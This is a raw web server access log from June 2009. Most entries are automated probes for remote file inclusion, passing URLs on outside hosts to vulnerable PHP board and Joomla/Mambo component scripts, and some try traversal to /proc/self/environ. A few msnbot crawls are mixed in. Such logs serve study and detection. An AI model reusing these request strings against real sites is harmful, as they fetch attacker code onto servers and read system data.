209.172.33.230 - - [26/Jun/2009:06:46:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:46:39 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:46:39 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:46:44 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:46:44 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:46:47 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:46:47 -0500] "GET /logs/access_log.1233705600//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:46:47 -0500] "GET /logs//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:47:05 -0500] "GET /logs/access_log.1242000000//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.106.210 - - [26/Jun/2009:06:47:25 -0500] "GET /logs/access_log.1191715200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.165.73.157 - - [26/Jun/2009:06:47:33 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:47:33 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:47:44 -0500] "GET /logs//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:47:46 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:47:46 -0500] "GET /logs/access_log.1233705600//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:06:48:02 -0500] "GET /logs/access_log.1242000000//RGboard/include/footer.php?_path[counter]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:48:33 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:50:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/yes.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:06:50:54 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/yes.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
121.165.73.157 - - [26/Jun/2009:06:51:44 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:06:57:09 -0500] "GET /logs///components/com_mambowiki/MamboLogin.php?IP=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
190.144.44.36 - - [26/Jun/2009:06:57:09 -0500] "GET ///components/com_mambowiki/MamboLogin.php?IP=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
190.144.44.36 - - [26/Jun/2009:06:57:20 -0500] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
190.144.44.36 - - [26/Jun/2009:06:57:20 -0500] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
65.55.106.193 - - [26/Jun/2009:06:57:56 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:06:58:22 -0500] "GET /logs/access_log.1217894400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
190.144.44.36 - - [26/Jun/2009:07:00:30 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
190.144.44.36 - - [26/Jun/2009:07:00:30 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
82.136.20.14 - - [26/Jun/2009:07:05:11 -0500] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:07:05:12 -0500] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
65.55.106.208 - - [26/Jun/2009:07:07:25 -0500] "GET /logs/ HTTP/1.1" 200 194785 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [26/Jun/2009:07:08:49 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:08:52 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194793 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:07:09:15 -0500] "GET ///components/com_mambowiki/MamboLogin.php?IP=http://kuettner.it/yes.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:07:09:15 -0500] "GET /logs///components/com_mambowiki/MamboLogin.php?IP=http://kuettner.it/yes.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:07:12:10 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:07:12:10 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
75.125.198.130 - - [26/Jun/2009:07:12:21 -0500] "GET //include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:07:12:21 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
89.108.67.131 - - [26/Jun/2009:07:17:31 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:07:17:32 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:07:19:15 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.108.67.131 - - [26/Jun/2009:07:19:16 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
201.232.54.48 - - [26/Jun/2009:07:20:35 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
75.125.198.130 - - [26/Jun/2009:07:22:40 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:22:40 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:22:40 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:22:40 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:24:03 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:07:24:03 -0500] "GET //include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
210.115.58.73 - - [26/Jun/2009:07:27:27 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:27:27 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:27:27 -0500] "GET /logs/access_log.1240358400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:27:51 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:29:29 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:29:29 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:29:29 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:07:29:34 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:31:38 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:31:38 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:31:38 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:31:38 -0500] "GET /logs/access_log.1240358400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:32:03 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:32:03 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:32:03 -0500] "GET /logs/access_log.1240358400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:32:03 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.111 - - [26/Jun/2009:07:32:53 -0500] "GET /_vti_cnf/?M=A HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [26/Jun/2009:07:33:24 -0500] "GET /bbshop/shop/index.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:07:33:25 -0500] "GET /logs/bbshop/shop/index.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:07:33:25 -0500] "GET /logs/access_log.1228608000%20%20/bbshop/shop/index.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:33:41 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/baner.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:33:41 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:33:41 -0500] "GET /logs/access_log.1238889600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/baner.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:33:41 -0500] "GET /logs/access_log.1240444800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/baner.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:33:54 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 359 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:07:33:54 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
209.172.33.230 - - [26/Jun/2009:07:34:50 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:34:50 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:34:50 -0500] "GET /logs/access_log.1238889600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:34:50 -0500] "GET /logs/access_log.1235260800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
65.55.208.121 - - [26/Jun/2009:07:34:56 -0500] "GET /logs/access_log.1189641600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.172.33.230 - - [26/Jun/2009:07:35:11 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:35:11 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:35:11 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:35:11 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:07:36:07 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:36:12 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194793 "-""libwww-perl/5.805"
211.230.156.161 - - [26/Jun/2009:07:37:09 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:09 -0500] "GET /logs/access_log.1241654400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:09 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:09 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:25 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:25 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:25 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:07:37:33 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:38:01 -0500] "GET /logs//html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:38:01 -0500] "GET //html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:38:01 -0500] "GET /logs/access_log.1240012800//html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:38:01 -0500] "GET /logs/access_log.1239494400//html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:07:39:35 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:07:39:35 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:07:39:35 -0500] "GET /logs/access_log.1229731200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:40:17 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:40:17 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:40:17 -0500] "GET /logs/access_log.1229731200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:07:40:17 -0500] "GET /logs/access_log.1235001600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:40:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:40:39 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:40:39 -0500] "GET /logs/access_log.1229731200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:07:40:39 -0500] "GET /logs/access_log.1235001600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:24 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:24 -0500] "GET //include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:24 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:24 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:30 -0500] "GET //include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:30 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:30 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:35 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:35 -0500] "GET //include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:35 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:07:41:37 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
121.165.73.157 - - [26/Jun/2009:07:41:38 -0500] "GET /logs/access_log.1235001600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:07:41:39 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:41:40 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194793 "-""libwww-perl/5.805"
